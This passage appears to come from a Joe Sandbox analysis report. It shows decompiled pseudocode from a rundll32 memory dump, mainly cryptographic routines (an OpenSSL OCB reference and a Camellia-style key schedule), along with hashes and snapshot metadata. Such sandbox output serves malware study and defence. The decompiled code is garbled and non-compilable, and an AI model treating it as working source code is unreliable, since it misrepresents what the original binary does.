                                        				signed long long _t85;
                                        				signed long long _t86;
                                        				signed long long _t102;
                                        				signed long long _t103;
                                        				signed long long _t105;
                                        				signed long long _t111;
                                        				signed long long _t113;
                                        				void* _t122;
                                        				signed long long _t125;
                                        				signed long long _t126;
                                        				signed long long _t127;
                                        				signed long long* _t132;
                                        				void* _t133;
                                        				signed long long _t137;
                                        				signed long long*** _t140;
                                        
                                        				_t113 = __rsi;
                                        				_t56 = __edx;
                                        				_t69 = _t122;
                                        				 *((long long*)(_t69 + 8)) = __rbx;
                                        				 *((long long*)(_t69 + 0x10)) = __rbp;
                                        				 *((long long*)(_t69 + 0x18)) = __rsi;
                                        				 *((long long*)(_t69 + 0x20)) = __rdi;
                                        				_push(_t133);
                                        				_t70 =  *((intOrPtr*)(__rcx));
                                        				_t140 = __rcx;
                                        				_t81 =  *_t70;
                                        				if (_t81 != 0) goto 0xf3125e71;
                                        				goto 0xf3125ff7;
                                        				_t125 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				r12d = 0x40;
                                        				_t118 =  *_t81 ^ _t125;
                                        				asm("dec eax");
                                        				_t83 = _t81[4] ^ _t125;
                                        				asm("dec ecx");
                                        				asm("dec eax");
                                        				if ((_t81[2] ^ _t125) != _t83) goto 0xf3125f71;
                                        				_t85 = _t83 - ( *_t81 ^ _t125) >> 3;
                                        				_t108 =  >  ? _t70 : _t85;
                                        				_t109 = ( >  ? _t70 : _t85) + _t85;
                                        				_t110 =  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85;
                                        				if (( ==  ? _t70 : ( >  ? _t70 : _t85) + _t85) - _t85 < 0) goto 0xf3125ef0;
                                        				r8d = _t133 - 0x38;
                                        				E0000021E21EF3132494(_t133 - 0x20, r8d & 0x0000003f, _t58, _t85, _t118,  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85, __rsi, _t118, _t125);
                                        				_t28 = E0000021E21EF3124EE0(_t70, _t118);
                                        				if (_t70 != 0) goto 0xf3125f18;
                                        				_t111 = _t85 + 4;
                                        				r8d = 8;
                                        				E0000021E21EF3132494(_t28, 0, _t58, _t85, _t118, _t111, _t113, _t118, _t125);
                                        				_t137 = _t70;
                                        				E0000021E21EF3124EE0(_t70, _t118);
                                        				if (_t137 == 0) goto 0xf3125e69;
                                        				_t126 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t132 = _t137 + _t85 * 8;
                                        				_t86 = _t137 + _t111 * 8;
                                        				asm("dec eax");
                                        				_t75 =  >  ? _t113 : _t86 - _t132 + 7 >> 3;
                                        				if (_t75 == 0) goto 0xf3125f71;
                                        				 *_t132 = _t113 ^ _t126;
                                        				if (_t113 + 1 != _t75) goto 0xf3125f5b;
                                        				_t127 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				asm("dec eax");
                                        				 *_t132 =  *(_t140[1]) ^ _t127;
                                        				_t102 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				asm("dec eax");
                                        				 *( *( *_t140)) = _t137 ^ _t102;
                                        				_t103 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				asm("dec ecx");
                                        				( *( *_t140))[1] =  &(_t132[1]) ^ _t103;
                                        				_t105 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				r12d = r12d - (_t56 & 0x0000003f);
                                        				asm("dec eax");
                                        				( *( *_t140))[2] = _t86 ^ _t105;
                                        				return 0;
                                        			}



























                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: ec4ddc6329df336c82c16dff0f76504d43fd22d5514629655868650dc617074e
                                        • Instruction ID: ed7898be36ef94e84035ef0938ff33e157c454435d3bd9cfbcd4b069211b8ea0
                                        • Opcode Fuzzy Hash: ec4ddc6329df336c82c16dff0f76504d43fd22d5514629655868650dc617074e
                                        • Instruction Fuzzy Hash: B1418072311A4486EF48CF2AE9583DAB7A1B368FD4F4A9026DE4D87B54DA3CC446C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E0000021E21EF3062220(long long __rax, long long __rbx, long long* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __r8, long long* __r9, long long _a8, long long _a16, long long _a24, void* _a40, void* _a48, void* _a56, long long _a72, long long _a80) {
                                        				void* _t80;
                                        				void* _t92;
                                        				void* _t93;
                                        				long long _t96;
                                        				intOrPtr _t99;
                                        				intOrPtr _t100;
                                        				long long* _t102;
                                        				signed char* _t108;
                                        				intOrPtr _t111;
                                        				intOrPtr _t118;
                                        				signed char* _t119;
                                        				void* _t120;
                                        				void* _t121;
                                        				void* _t122;
                                        				long long _t130;
                                        				void* _t139;
                                        				long long* _t140;
                                        
                                        				_t130 = __r8;
                                        				_t96 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_a24 = __rdi;
                                        				E0000021E21EF310C220();
                                        				_t125 = __rdx;
                                        				r8d = 0xc0;
                                        				_t102 = __r9;
                                        				_t140 = __rcx;
                                        				E0000021E21EF310E410(_t80, 0, _t92, _t93, __rcx, __rdx, __r8, __r8);
                                        				r8d = 0xa7;
                                        				 *((long long*)(_t140 + 0x28)) = 0;
                                        				 *((long long*)(_t140 + 0x30)) = 5;
                                        				_t6 = _t130 - 0x57; // 0xa1
                                        				_t81 = _t6;
                                        				E0000021E21EF3025700();
                                        				 *((long long*)(_t140 + 0x58)) = _t96;
                                        				if (_t96 == 0) goto 0xf30623ba;
                                        				_t115 = _t140 + 0x38;
                                        				 *((long long*)(_t140 + 8)) = _a72;
                                        				_t98 = _a80;
                                        				 *((long long*)(_t140 + 0x20)) = _a80;
                                        				 *_t140 = _t102;
                                        				 *((long long*)(_t140 + 0x10)) = __rdx;
                                        				 *((long long*)(_t140 + 0x18)) = __r8;
                                        				 *_t102();
                                        				E0000021E21EF3062610(_t6, _a80, _t102, _t140 + 0x38, _t140 + 0x38, __rdx, _t140 + 0x48, _t139);
                                        				 *(_t140 + 0x57) =  *(_t140 + 0x57) ^ (( *(_t140 + 0x38) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				_t118 =  *((intOrPtr*)(_t140 + 0x58));
                                        				E0000021E21EF3062610(_t6, _a80, _t102, _t140 + 0x48, _t140 + 0x38, __rdx, _t118, _t139);
                                        				 *(_t118 + 0xf) =  *(_t118 + 0xf) ^ (( *(_t140 + 0x48) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				_t108 =  *((intOrPtr*)(_t140 + 0x58));
                                        				_t119 =  &(_t108[0x10]);
                                        				E0000021E21EF3062610(_t6, _t98, _t102, _t108, _t140 + 0x38, _t125, _t119, _t139);
                                        				_t119[0xf] = _t119[0xf] ^ (( *_t108 & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				_t99 =  *((intOrPtr*)(_t140 + 0x58));
                                        				_t120 = _t99 + 0x20;
                                        				E0000021E21EF3062610(_t81, _t99, _t102, _t99 + 0x10, _t115, _t125, _t120, _t139);
                                        				 *(_t120 + 0xf) =  *(_t120 + 0xf) ^ (( *(_t99 + 0x10) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				_t100 =  *((intOrPtr*)(_t140 + 0x58));
                                        				_t121 = _t100 + 0x30;
                                        				E0000021E21EF3062610(_t81, _t100, _t102, _t100 + 0x20, _t115, _t125, _t121, _t139);
                                        				 *(_t121 + 0xf) =  *(_t121 + 0xf) ^ (( *(_t100 + 0x20) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				_t111 =  *((intOrPtr*)(_t140 + 0x58));
                                        				_t122 = _t111 + 0x40;
                                        				E0000021E21EF3062610(_t81, _t100, _t102, _t111 + 0x30, _t115, _t125, _t122, _t139);
                                        				 *(_t122 + 0xf) =  *(_t122 + 0xf) ^ (( *(_t111 + 0x30) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
                                        				 *((long long*)(_t140 + 0x28)) = 4;
                                        				return 1;
                                        			}





















                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\modes\ocb128.c
                                        • API String ID: 0-1267065356
                                        • Opcode ID: 6b4998fcc8a68af9ad6c8557037b5ce1186b9dc7753541905d98c2a704ec836c
                                        • Instruction ID: f8bd92174f0364afec45e7af27ef8bfc88eb60f7614ba642530d69f1d5688f4f
                                        • Opcode Fuzzy Hash: 6b4998fcc8a68af9ad6c8557037b5ce1186b9dc7753541905d98c2a704ec836c
                                        • Instruction Fuzzy Hash: B941BE32204B91C1EB00CB66D548BEA7BA9F755784F568057EE8C4BBCBCABDD166C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: ffc336b6fe9c5f9d0d9a73f9c0a6096c91eae253ef8ffdcf6b7396b1169ad808
                                        • Instruction ID: f1b50d5e1c9f2fe0a7000fa1484a9d1f78ff3218631fcac42f26c26866ec75d6
                                        • Opcode Fuzzy Hash: ffc336b6fe9c5f9d0d9a73f9c0a6096c91eae253ef8ffdcf6b7396b1169ad808
                                        • Instruction Fuzzy Hash: A5211872A146408BE784CB38E84638BB7F0F79C748F419115BA89C6A2AEB3CD591CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3097230(unsigned int __ecx, signed int __rax, long long __rbx, signed int __rcx, signed int __rdx, long long __rdi, signed int __rsi, signed int __rbp, signed int __r8, signed int __r10, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				signed int _t479;
                                        				unsigned int _t495;
                                        				signed int _t510;
                                        				signed int _t512;
                                        				signed int _t514;
                                        				signed int _t516;
                                        				signed int _t518;
                                        				unsigned int _t520;
                                        				signed int _t523;
                                        				unsigned int _t527;
                                        				signed int _t529;
                                        				signed int _t532;
                                        				unsigned int _t534;
                                        				signed int _t536;
                                        				unsigned int _t538;
                                        				unsigned int _t550;
                                        				unsigned int _t554;
                                        				signed int _t560;
                                        				unsigned int _t566;
                                        				signed int _t570;
                                        				signed int _t587;
                                        				unsigned int _t599;
                                        				signed int _t629;
                                        				signed int _t633;
                                        				signed int _t637;
                                        				signed int _t639;
                                        				unsigned int _t644;
                                        				unsigned int _t646;
                                        				signed int _t650;
                                        				signed int _t654;
                                        				signed int _t664;
                                        				signed int _t668;
                                        				signed int _t672;
                                        				signed int _t676;
                                        				signed int _t680;
                                        				signed int _t682;
                                        				unsigned int _t684;
                                        				signed int _t686;
                                        				signed int _t688;
                                        				signed int _t690;
                                        				unsigned int _t692;
                                        				signed int _t708;
                                        				signed int _t710;
                                        				signed int _t711;
                                        				signed int _t713;
                                        				signed int _t715;
                                        				signed int _t717;
                                        				signed int _t719;
                                        				signed int _t720;
                                        				signed int _t722;
                                        				signed int _t724;
                                        				signed long long _t737;
                                        				signed long long _t743;
                                        				signed long long _t749;
                                        				signed long long _t755;
                                        				signed long long _t761;
                                        				signed long long _t767;
                                        				signed long long _t773;
                                        				signed long long _t780;
                                        				signed long long _t786;
                                        				signed long long _t792;
                                        				signed long long _t798;
                                        				signed long long _t820;
                                        				signed long long _t821;
                                        				signed long long _t822;
                                        				signed long long _t823;
                                        				signed long long _t824;
                                        				signed long long _t825;
                                        				signed long long _t826;
                                        				signed long long _t827;
                                        				signed long long _t828;
                                        				signed long long _t829;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_a32 = __rdi;
                                        				r12d =  *__rdx & 0x000000ff;
                                        				r11d = __ecx;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 1) & 0x000000ff;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 2) & 0x000000ff;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 3) & 0x000000ff;
                                        				 *__r8 = r12d;
                                        				r13d =  *(__rdx + 4) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 5) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 6) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 7) & 0x000000ff;
                                        				 *(__r8 + 4) = r13d;
                                        				r15d =  *(__rdx + 8) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 9) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 0xa) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 0xb) & 0x000000ff;
                                        				 *(__r8 + 8) = r15d;
                                        				 *(__r8 + 0xc) = ((( *(__rdx + 0xc) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xd) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xe) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xf) & 0x000000ff;
                                        				if (__ecx == 0x80) goto 0xf30973c6;
                                        				r12d =  *(__rdx + 0x10) & 0x000000ff;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 0x11) & 0x000000ff;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 0x12) & 0x000000ff;
                                        				r12d = r12d << 8;
                                        				r12d = r12d ^  *(__rdx + 0x13) & 0x000000ff;
                                        				 *(__r8 + 0x20) = r12d;
                                        				r13d =  *(__rdx + 0x14) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 0x15) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 0x16) & 0x000000ff;
                                        				r13d = r13d << 8;
                                        				r13d = r13d ^  *(__rdx + 0x17) & 0x000000ff;
                                        				 *(__r8 + 0x24) = r13d;
                                        				if (__ecx != 0xc0) goto 0xf309736a;
                                        				r15d = r12d;
                                        				r15d =  !r15d;
                                        				 *(__r8 + 0x28) = r15d;
                                        				goto 0xf30973b3;
                                        				r15d =  *(__rdx + 0x18) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 0x19) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 0x1a) & 0x000000ff;
                                        				r15d = r15d << 8;
                                        				r15d = r15d ^  *(__rdx + 0x1b) & 0x000000ff;
                                        				 *(__r8 + 0x28) = r15d;
                                        				_t708 = ((( *(__rdx + 0x1c) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1d) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1e) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1f) & 0x000000ff;
                                        				r12d = r12d ^  *__r8;
                                        				r13d = r13d ^  *(__r8 + 4);
                                        				r15d = r15d ^  *(__r8 + 8);
                                        				 *(__r8 + 0x2c) = _t708;
                                        				_t680 =  *__r8;
                                        				_t684 =  *(__r8 + 4);
                                        				r8d = r12d;
                                        				_t820 = __r8 ^ __rax;
                                        				_t737 = _t820 >> 0x18;
                                        				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t737 * 4);
                                        				r8d = r13d;
                                        				_t821 = _t820 ^ 0x3bcc908b;
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t737 * 4);
                                        				_t743 = _t821 >> 0x18;
                                        				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t743 * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + _t743 * 4);
                                        				r9d = r9d ^ r10d;
                                        				r10d = r10d >> 8;
                                        				r15d = r15d ^ r9d;
                                        				r8d = r15d;
                                        				_t710 = _t708 ^  *(__r8 + 0xc) ^ (r10d << 0x00000018) + r10d ^ r9d;
                                        				_t822 = _t821 ^ _t743;
                                        				_t749 = _t822 >> 0x18;
                                        				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t749 * 4);
                                        				r8d = _t710;
                                        				_t823 = _t822 ^ 0x4caa73b2;
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t749 * 4);
                                        				_t755 = _t823 >> 0x18;
                                        				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t755 * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + _t755 * 4);
                                        				r9d = r9d ^ r10d;
                                        				r12d = r12d ^ _t680 ^ r9d;
                                        				r10d = r10d >> 8;
                                        				r8d = r12d;
                                        				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ _t684 ^ r9d;
                                        				_t824 = _t823 ^ _t755;
                                        				_t761 = _t824 >> 0x18;
                                        				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t761 * 4);
                                        				r8d = r13d;
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t761 * 4);
                                        				_t825 = _t824 ^ _t761;
                                        				_t767 = _t825 >> 0x18;
                                        				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t767 * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + _t767 * 4);
                                        				r9d = r9d ^ r10d;
                                        				_t510 =  *(__r8 + 0xc);
                                        				r15d = r15d ^  *(__r8 + 8) ^ r9d;
                                        				r10d = r10d >> 8;
                                        				r8d = r15d;
                                        				_t826 = _t825 ^ 0x54ff53a5;
                                        				_t711 = _t710 ^ (r10d << 0x00000018) + r10d ^ _t510 ^ r9d;
                                        				_t773 = _t826 >> 0x18;
                                        				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t773 * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t773 * 4);
                                        				r9d = _t711;
                                        				r8d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				_t780 = (0xf3177b70 ^ _t773) >> 0x18;
                                        				r8d = r8d ^  *(0xf3177b70 + 0x800 + _t780 * 4);
                                        				r8d = r8d ^  *(0xf3177b70 + _t780 * 4);
                                        				r8d = r8d ^ r10d;
                                        				r12d = r12d ^ r8d;
                                        				r10d = r10d >> 8;
                                        				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ r8d;
                                        				if (r11d != 0x80) goto 0xf30979f6;
                                        				r8d = _t711;
                                        				 *(__r8 + 0x1c) = _t711;
                                        				_t713 = _t711 << 0x0000000f | r12d >> 0x00000011;
                                        				r8d = r8d >> 0x11;
                                        				r11d = _t713;
                                        				 *(__r8 + 0x3c) = _t713;
                                        				r11d = r11d >> 0x11;
                                        				 *(__r8 + 0x18) = r15d;
                                        				r15d = r15d << 0xf;
                                        				r8d = r8d | r15d;
                                        				 *(__r8 + 0x14) = r13d;
                                        				r10d = r8d;
                                        				 *(__r8 + 0x38) = r8d;
                                        				r10d = r10d >> 0x11;
                                        				r8d = r8d << 0xf;
                                        				r11d = r11d | r8d;
                                        				r13d = r13d << 0xf;
                                        				_t629 = r15d >> 0x00000011 | r13d;
                                        				 *(__r8 + 0x10) = r12d;
                                        				r9d = _t629;
                                        				 *(__r8 + 0x34) = _t629;
                                        				r10d = r10d | _t629 << 0x0000000f;
                                        				r9d = r9d >> 0x11;
                                        				 *(__r8 + 0x44) = r10d;
                                        				r12d = r12d << 0xf;
                                        				_t550 = r13d >> 0x00000011 | r12d;
                                        				 *(__r8 + 0x48) = r11d;
                                        				 *(__r8 + 0x30) = _t550;
                                        				r9d = r9d | _t550 << 0x0000000f;
                                        				_t715 = _t713 << 0x0000000f | _t550 >> 0x00000011;
                                        				 *(__r8 + 0x40) = r9d;
                                        				 *(__r8 + 0x4c) = _t715;
                                        				r9d = r9d << 0xf;
                                        				r10d = r10d << 0xf;
                                        				_t633 = r11d >> 0x00000011 | r10d;
                                        				r10d = _t633;
                                        				 *(__r8 + 0x64) = _t633;
                                        				_t554 = r10d >> 0x00000011 | r9d;
                                        				r11d = r11d << 0xf;
                                        				r9d = _t715;
                                        				r10d = r10d >> 0x11;
                                        				r9d = r9d >> 0x11;
                                        				r9d = r9d | r11d;
                                        				_t717 = _t715 << 0x0000000f | r9d >> 0x00000011;
                                        				 *(__r8 + 0x60) = _t554;
                                        				r8d = r9d;
                                        				r8d = r8d >> 0x11;
                                        				r8d = r8d | _t633 << 0x0000000f;
                                        				r9d = r9d << 0xf;
                                        				r10d = r10d | _t554 << 0x0000000f;
                                        				_t637 = _t717 >> 0x00000011 | r9d;
                                        				_t719 = _t717 << 0x0000000f | _t554 >> 0x00000011;
                                        				 *(__r8 + 0x78) = _t637;
                                        				 *(__r8 + 0x70) = r10d;
                                        				 *(__r8 + 0x74) = r8d;
                                        				 *(__r8 + 0x7c) = _t719;
                                        				r9d = _t637;
                                        				r9d = r9d >> 0x1e;
                                        				r8d = _t719;
                                        				r9d = r9d | _t826 * 0x00000004;
                                        				r8d = r8d >> 0x1e;
                                        				r8d = r8d | 0x87bcc5dedc0;
                                        				 *(__r8 + 0xa0) = r9d;
                                        				 *(__r8 + 0xa4) = r8d;
                                        				r10d = __r10 * 4;
                                        				r10d = r10d | r8d >> 0x0000001e;
                                        				_t639 = __rbp * 0x00000004 | r10d >> 0x0000001e;
                                        				 *(__r8 + 0xac) = r10d;
                                        				 *(__r8 + 0xa8) = _t639;
                                        				r9d = r9d << 0x11;
                                        				r8d = r8d << 0x11;
                                        				 *(__r8 + 0xc0) = r8d >> 0x0000000f | r9d;
                                        				r9d = _t510;
                                        				 *(__r8 + 0xc4) = _t639 >> 0x0000000f | r8d;
                                        				r9d = r9d >> 0x11;
                                        				 *(__r8 + 0xc8) = _t639 << 0x00000011 | r10d >> 0x0000000f;
                                        				_t512 = _t510 << 0x0000000f | _t680 >> 0x00000011;
                                        				r10d = r10d << 0x11;
                                        				r10d = r10d | r9d >> 0x0000000f;
                                        				_t560 =  *(__r8 + 8);
                                        				r8d = _t560;
                                        				r8d = r8d >> 0x11;
                                        				r8d = r8d | _t684 << 0x0000000f;
                                        				r9d = r9d | _t560 << 0x0000000f;
                                        				_t644 = _t684 >> 0x00000011 | _t680 << 0x0000000f;
                                        				 *(__r8 + 0x24) = r8d;
                                        				 *(__r8 + 0x20) = _t644;
                                        				_t646 = _t644 << 0x0000001e | r8d >> 0x00000002;
                                        				r8d = r8d << 0x1e;
                                        				 *(__r8 + 0x28) = r9d;
                                        				r8d = r8d | r9d >> 0x00000002;
                                        				r9d = r9d << 0x1e;
                                        				 *(__r8 + 0x2c) = _t512;
                                        				r9d = r9d | _t512 >> 0x00000002;
                                        				_t514 = _t512 << 0x0000001e | _t644 >> 0x00000002;
                                        				 *(__r8 + 0x58) = r9d;
                                        				 *(__r8 + 0xcc) = r10d;
                                        				 *(__r8 + 0x50) = _t646;
                                        				 *(__r8 + 0x54) = r8d;
                                        				 *(__r8 + 0x5c) = _t514;
                                        				_t566 = r8d >> 0x00000011 | _t646 << 0x0000000f;
                                        				r8d = r8d << 0xf;
                                        				r9d = r9d << 0xf;
                                        				_t650 = r9d >> 0x00000011 | r8d;
                                        				r8d = _t514;
                                        				r8d = r8d >> 0x11;
                                        				r8d = r8d | r9d;
                                        				_t516 = _t514 << 0x0000000f | _t646 >> 0x00000011;
                                        				 *(__r8 + 0x68) = r8d;
                                        				 *(__r8 + 0x6c) = _t516;
                                        				r9d = _t650;
                                        				r9d = r9d >> 0xf;
                                        				r9d = r9d | _t566 << 0x00000011;
                                        				_t570 = r8d >> 0x0000000f | _t650 << 0x00000011;
                                        				r8d = r8d << 0x11;
                                        				 *(__r8 + 0x80) = r9d;
                                        				_t654 = _t516 >> 0x0000000f | r8d;
                                        				_t518 = _t516 << 0x00000011 | _t566 >> 0x0000000f;
                                        				 *(__r8 + 0x84) = _t570;
                                        				 *(__r8 + 0x8c) = _t518;
                                        				r8d = _t570;
                                        				r9d = r9d << 0x11;
                                        				r10d = _t518;
                                        				r8d = r8d >> 0xf;
                                        				r8d = r8d | r9d;
                                        				 *(__r8 + 0x88) = _t654;
                                        				r9d = _t654;
                                        				r10d = r10d >> 0xf;
                                        				r10d = r10d | _t654 << 0x00000011;
                                        				r9d = r9d >> 0xf;
                                        				r9d = r9d | _t570 << 0x00000011;
                                        				_t520 = _t518 << 0x00000011 | r9d >> 0x0000000f;
                                        				 *(__r8 + 0x94) = r9d;
                                        				 *(__r8 + 0x9c) = _t520;
                                        				r9d = r9d << 0x11;
                                        				 *(__r8 + 0xb4) = r10d >> 0x0000000f | r9d;
                                        				 *(__r8 + 0x98) = r10d;
                                        				r10d = r10d << 0x11;
                                        				 *(__r8 + 0x90) = r8d;
                                        				r8d = r8d << 0x11;
                                        				 *(__r8 + 0xb8) = _t520 >> 0x0000000f | r10d;
                                        				 *(__r8 + 0xb0) = r9d >> 0x0000000f | r8d;
                                        				goto 0xf3097fd5;
                                        				_t523 =  *(__r8 + 0x20);
                                        				_t682 =  *(__r8 + 0x24);
                                        				_t686 =  *(__r8 + 0x2c);
                                        				 *(__r8 + 0x30) = r12d;
                                        				r12d = r12d ^ _t523;
                                        				r8d = r12d;
                                        				_t827 = _t826 ^ 0x10e527fa;
                                        				 *(__r8 + 0x34) = r13d;
                                        				 *(__r8 + 0x38) = r15d;
                                        				r13d = r13d ^ _t682;
                                        				_t786 = _t827 >> 0x18;
                                        				r10d =  *0xA9ABF757130;
                                        				 *(__r8 + 0x3c) = _t719;
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t786 * 4);
                                        				r8d = r13d;
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t786 * 4);
                                        				_t828 = _t827 ^ _t786;
                                        				_t792 = _t828 >> 0x18;
                                        				r9d =  *0xA9ABF757530;
                                        				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t792 * 4);
                                        				r9d = r9d ^  *(0xf3177b70 + _t792 * 4);
                                        				r11d =  *(__r8 + 0x28);
                                        				r9d = r9d ^ r10d;
                                        				r15d = r15d ^ r11d ^ r9d;
                                        				r10d = r10d >> 8;
                                        				r8d = r15d;
                                        				_t720 = _t719 ^ (r10d << 0x00000018) + r10d ^ _t686 ^ r9d;
                                        				_t829 = _t828 ^ _t792;
                                        				_t798 = _t829 >> 0x18;
                                        				r10d =  *0xA9ABF757130;
                                        				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + _t798 * 4);
                                        				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t798 * 4);
                                        				r9d = _t720;
                                        				r8d =  *0xA9ABF757530;
                                        				 *(__r8 + 0x1c) = _t720;
                                        				r8d = r8d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
                                        				 *(__r8 + 0x18) = r15d;
                                        				r8d = r8d ^  *0xA9ABF757130;
                                        				r8d = r8d ^  *0x21EF602EA24;
                                        				r8d = r8d ^ r10d;
                                        				r12d = r12d ^ r8d;
                                        				r10d = r10d >> 8;
                                        				 *(__r8 + 0x10) = r12d;
                                        				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ r8d;
                                        				r12d = r12d << 0x1e;
                                        				r12d = r12d | r13d >> 0x00000002;
                                        				 *(__r8 + 0x14) = r13d;
                                        				r13d = r13d << 0x1e;
                                        				r13d = r13d | r15d >> 0x00000002;
                                        				r15d = r15d << 0x1e;
                                        				 *(__r8 + 0x50) = r12d;
                                        				r15d = r15d | _t720 >> 0x00000002;
                                        				_t722 = _t720 << 0x0000001e | r12d >> 0x00000002;
                                        				 *(__r8 + 0x54) = r13d;
                                        				 *(__r8 + 0x5c) = _t722;
                                        				r12d = r12d << 0x1e;
                                        				r12d = r12d | r13d >> 0x00000002;
                                        				r13d = r13d << 0x1e;
